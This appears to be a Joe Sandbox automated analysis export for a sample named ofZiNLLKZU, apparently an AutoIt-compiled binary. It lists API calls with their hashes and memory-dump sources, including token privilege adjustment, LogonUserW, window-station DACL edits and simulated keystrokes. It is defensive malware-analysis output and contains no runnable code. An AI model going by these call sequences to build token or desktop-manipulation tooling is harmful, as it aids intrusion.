                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 6a7b0931efb186a7febaad214bba5efb44fa32acf1e3b0a4d1c5afdf556a08f9
                                                                                • Instruction ID: 617a7ca275ac73957a99dff3d5920d621fc773557dd93191cffde9949225c3d6
                                                                                • Opcode Fuzzy Hash: 6a7b0931efb186a7febaad214bba5efb44fa32acf1e3b0a4d1c5afdf556a08f9
                                                                                • Instruction Fuzzy Hash: F7F0B47168222967FB395F629C09BAB3B8ABF817A0F144111FB19AA3C0CE71D80146E0
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: ddd0821339011aced2ff01467d1f160748247d4867104de23ddb7ea312bd46a2
                                                                                • Instruction ID: 11215f2f0da3461671b56e8887a1666e65cb721e5df1eb3c9bed38f9b6a6e99c
                                                                                • Opcode Fuzzy Hash: ddd0821339011aced2ff01467d1f160748247d4867104de23ddb7ea312bd46a2
                                                                                • Instruction Fuzzy Hash: 64E0E53118023956D7252A669C04BEB3B4FAF837B2F0580A0FD06967C0CB11EE0186E1
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4F6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 5ce2f0d1ebfececc930fde42a29a8deb95b9ac4370c608bac1d2573b30fcc011
                                                                                • Instruction ID: 48263dd34edf05ba385d231c6e79eb695b4eb1e5163b4567b7fb78d2e802c220
                                                                                • Opcode Fuzzy Hash: 5ce2f0d1ebfececc930fde42a29a8deb95b9ac4370c608bac1d2573b30fcc011
                                                                                • Instruction Fuzzy Hash: 16F01571105792CFDB349F68E494822BFE4BF143293208D6FE2EA82721CB319844DF10
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D2DC4
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath_wcslen
                                                                                • String ID:
                                                                                • API String ID: 541455249-0
                                                                                • Opcode ID: 0097ed18f5fcd5e0266c1842e1ce6ddd872bd63becee797940c0150c19aa85a6
                                                                                • Instruction ID: a13fe42d67ad340a61d46bbdca8a8325bb38b7ccd026340ea5e2178f09086dc6
                                                                                • Opcode Fuzzy Hash: 0097ed18f5fcd5e0266c1842e1ce6ddd872bd63becee797940c0150c19aa85a6
                                                                                • Instruction Fuzzy Hash: 6FE0CD726041245BC720A2589C05FEA77DDDFC8790F044076FD09D7248D960AD818590
                                                                                APIs
                                                                                  • Part of subcall function 005D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005D3908
                                                                                  • Part of subcall function 005DD730: GetInputState.USER32 ref: 005DD807
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 005D2B6B
                                                                                  • Part of subcall function 005D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 005D314E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                • String ID:
                                                                                • API String ID: 3667716007-0
                                                                                • Opcode ID: a6a509abe0165270b5b97a273e215bc3af865148040093a20621723132364f46
                                                                                • Instruction ID: bcf4d0495b20ef5818f58a4ff2710d013c4cc48e0a38da36660a5d673553c680
                                                                                • Opcode Fuzzy Hash: a6a509abe0165270b5b97a273e215bc3af865148040093a20621723132364f46
                                                                                • Instruction Fuzzy Hash: B9E0262130020606C724BB3CA81A5BDAF9AFBE7351F00143FF04287362CE644A454723
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00610704,?,?,00000000,?,00610704,00000000,0000000C), ref: 006103B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: e71153d4d028747fc7b47b461783ee3da38fdf25db6b64fa104a4b0db6e8b96e
                                                                                • Instruction ID: f0cb12b7a0ce7ada8c37dfe1dfb2e1a13e97d0723726b2afc167b080658274e3
                                                                                • Opcode Fuzzy Hash: e71153d4d028747fc7b47b461783ee3da38fdf25db6b64fa104a4b0db6e8b96e
                                                                                • Instruction Fuzzy Hash: E7D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000FE5856020C772E821AB90
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 005D1CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem
                                                                                • String ID:
                                                                                • API String ID: 3098949447-0
                                                                                • Opcode ID: d631d20c3c72c86bd71cb0f2f1dc98c1b1c6c064bca413cb01e26037720b5b5a
                                                                                • Instruction ID: e2681cfdeab473b499b1418a13bc9f2afd693b29750693276b1f4a8788b2605b
                                                                                • Opcode Fuzzy Hash: d631d20c3c72c86bd71cb0f2f1dc98c1b1c6c064bca413cb01e26037720b5b5a
                                                                                • Instruction Fuzzy Hash: C0C09B352C03059FF7145B84BC5AF107756B349B10F045001F649595E3C3E13430DE50
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 01A6A249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: 83e3d0716b99a101e7aec5108a19d3c991f35023cfbb114648e9952381c31abf
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: 50E09A7498520DAFDB00DFA4D64969D7BB4EF04301F1005A1FD05A7690DA319A548A62
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 01A6A249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: 30185886b6b607bb097fef07573e5fd0d7da1486f3d2ea3ccd3a347c1815bbb7
                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction Fuzzy Hash: 20E0E67498520DDFDB00DFB4D64969D7BB4EF04301F100161FD05E2280D6319D50CA62
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0066961A
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066965B
                                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0066969F
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006696C9
                                                                                • SendMessageW.USER32 ref: 006696F2
                                                                                • GetKeyState.USER32(00000011), ref: 0066978B
                                                                                • GetKeyState.USER32(00000009), ref: 00669798
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006697AE
                                                                                • GetKeyState.USER32(00000010), ref: 006697B8
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006697E9
                                                                                • SendMessageW.USER32 ref: 00669810
                                                                                • SendMessageW.USER32(?,00001030,?,00667E95), ref: 00669918
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0066992E
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00669941
                                                                                • SetCapture.USER32(?), ref: 0066994A
                                                                                • ClientToScreen.USER32(?,?), ref: 006699AF
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006699BC
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006699D6
                                                                                • ReleaseCapture.USER32 ref: 006699E1
                                                                                • GetCursorPos.USER32(?), ref: 00669A19
                                                                                • ScreenToClient.USER32(?,?), ref: 00669A26
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00669A80
                                                                                • SendMessageW.USER32 ref: 00669AAE
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00669AEB
                                                                                • SendMessageW.USER32 ref: 00669B1A
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00669B3B
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00669B4A
                                                                                • GetCursorPos.USER32(?), ref: 00669B68
                                                                                • ScreenToClient.USER32(?,?), ref: 00669B75
                                                                                • GetParent.USER32(?), ref: 00669B93
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00669BFA
                                                                                • SendMessageW.USER32 ref: 00669C2B
                                                                                • ClientToScreen.USER32(?,?), ref: 00669C84
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00669CB4
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00669CDE
                                                                                • SendMessageW.USER32 ref: 00669D01
                                                                                • ClientToScreen.USER32(?,?), ref: 00669D4E
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00669D82
                                                                                  • Part of subcall function 005E9944: GetWindowLongW.USER32(?,000000EB), ref: 005E9952
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00669E05
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                • String ID: @GUI_DRAGID$F$p#j
                                                                                • API String ID: 3429851547-1181617611
                                                                                • Opcode ID: 19e942869c6cb140afbd5c03c2b694ffe63c86858c4295d3ae0502359f5c12b1
                                                                                • Instruction ID: 76b4e8e7a6f002470a5f916bf52aef33fcda7fc855f57752bac42c813ef11c91
                                                                                • Opcode Fuzzy Hash: 19e942869c6cb140afbd5c03c2b694ffe63c86858c4295d3ae0502359f5c12b1
                                                                                • Instruction Fuzzy Hash: 9D426E34204741AFEB24DF28CC44AAABBEAFF4A320F140619F995C73A1D771A855CF61
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 006648F3
                                                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00664908
                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00664927
                                                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0066494B
                                                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0066495C
                                                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0066497B
                                                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 006649AE
                                                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 006649D4
                                                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00664A0F
                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00664A56
                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00664A7E
                                                                                • IsMenu.USER32(?), ref: 00664A97
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00664AF2
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00664B20
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00664B94
                                                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00664BE3
                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00664C82
                                                                                • wsprintfW.USER32 ref: 00664CAE
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00664CC9
                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00664CF1
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00664D13
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00664D33
                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00664D5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 4054740463-328681919
                                                                                • Opcode ID: c69dba0b68ec2466ab14c72606df45363f28cb27ff0067abaa524bf8d6128f0c
                                                                                • Instruction ID: 8ffb4ab2b65f4e1d8fdb338d676f01b2d88b69a95695aa6d28ca2dff27c112f0
                                                                                • Opcode Fuzzy Hash: c69dba0b68ec2466ab14c72606df45363f28cb27ff0067abaa524bf8d6128f0c
                                                                                • Instruction Fuzzy Hash: 3B12FD71600245ABEB249F28DC49FBE7BBAEF85710F104129F516EB2E1DBB4A941CB50
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 005EF998
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062F474
                                                                                • IsIconic.USER32(00000000), ref: 0062F47D
                                                                                • ShowWindow.USER32(00000000,00000009), ref: 0062F48A
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0062F494
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0062F4AA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0062F4B1
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0062F4BD
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0062F4CE
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0062F4D6
                                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0062F4DE
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0062F4E1
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F4F6
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F501
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F50B
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F510
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F519
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F51E
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F528
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F52D
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0062F530
                                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0062F557
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: ba88ca4ca7f9d305f1c150a532290d59cb5263e47d953f2f708c0541d4e5e12c
                                                                                • Instruction ID: 48cb7cb53aa22b34cf43321034f127526fa64e73b3a7d9c0c6dfbcabb208da45
                                                                                • Opcode Fuzzy Hash: ba88ca4ca7f9d305f1c150a532290d59cb5263e47d953f2f708c0541d4e5e12c
                                                                                • Instruction Fuzzy Hash: 14316371A40668BBEB206BB59C4AFBF7E7EEB44B60F101026F641F61D1C6F15D10AE60
                                                                                APIs
                                                                                  • Part of subcall function 006316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063170D
                                                                                  • Part of subcall function 006316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063173A
                                                                                  • Part of subcall function 006316C3: GetLastError.KERNEL32 ref: 0063174A
                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00631286
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 006312A8
                                                                                • CloseHandle.KERNEL32(?), ref: 006312B9
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006312D1
                                                                                • GetProcessWindowStation.USER32 ref: 006312EA
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 006312F4
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00631310
                                                                                  • Part of subcall function 006310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006311FC), ref: 006310D4
                                                                                  • Part of subcall function 006310BF: CloseHandle.KERNEL32(?,?,006311FC), ref: 006310E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                • String ID: $default$winsta0$Zi
                                                                                • API String ID: 22674027-3349466720
                                                                                • Opcode ID: fb35c0b514511f8baac02fe21bd1516e994f264f927c806f9ea00f0c00b2e0ae
                                                                                • Instruction ID: d37f1721c7a2863d25b9a3e7a4811d239b7ef1a575189f81662c8c0d09ca70ac
                                                                                • Opcode Fuzzy Hash: fb35c0b514511f8baac02fe21bd1516e994f264f927c806f9ea00f0c00b2e0ae
                                                                                • Instruction Fuzzy Hash: E8819A71900309AFDF219FA4DC49BFE7BBAEF05700F144129F911AA2A1CB758A44CBA4
                                                                                APIs
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00631114
                                                                                  • Part of subcall function 006310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631120
                                                                                  • Part of subcall function 006310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 0063112F
                                                                                  • Part of subcall function 006310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631136
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0063114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00630BCC
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00630C00
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630C17
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00630C51
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00630C6D
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630C84
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00630C8C
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00630C93
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00630CB4
                                                                                • CopySid.ADVAPI32(00000000), ref: 00630CBB
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00630CEA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00630D0C
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00630D1E
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630D45
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D4C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630D55
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D5C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630D65
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D6C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00630D78
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D7F
                                                                                  • Part of subcall function 00631193: GetProcessHeap.KERNEL32(00000008,00630BB1,?,00000000,?,00630BB1,?), ref: 006311A1
                                                                                  • Part of subcall function 00631193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00630BB1,?), ref: 006311A8
                                                                                  • Part of subcall function 00631193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00630BB1,?), ref: 006311B7
                                                                                Memory Dump Source
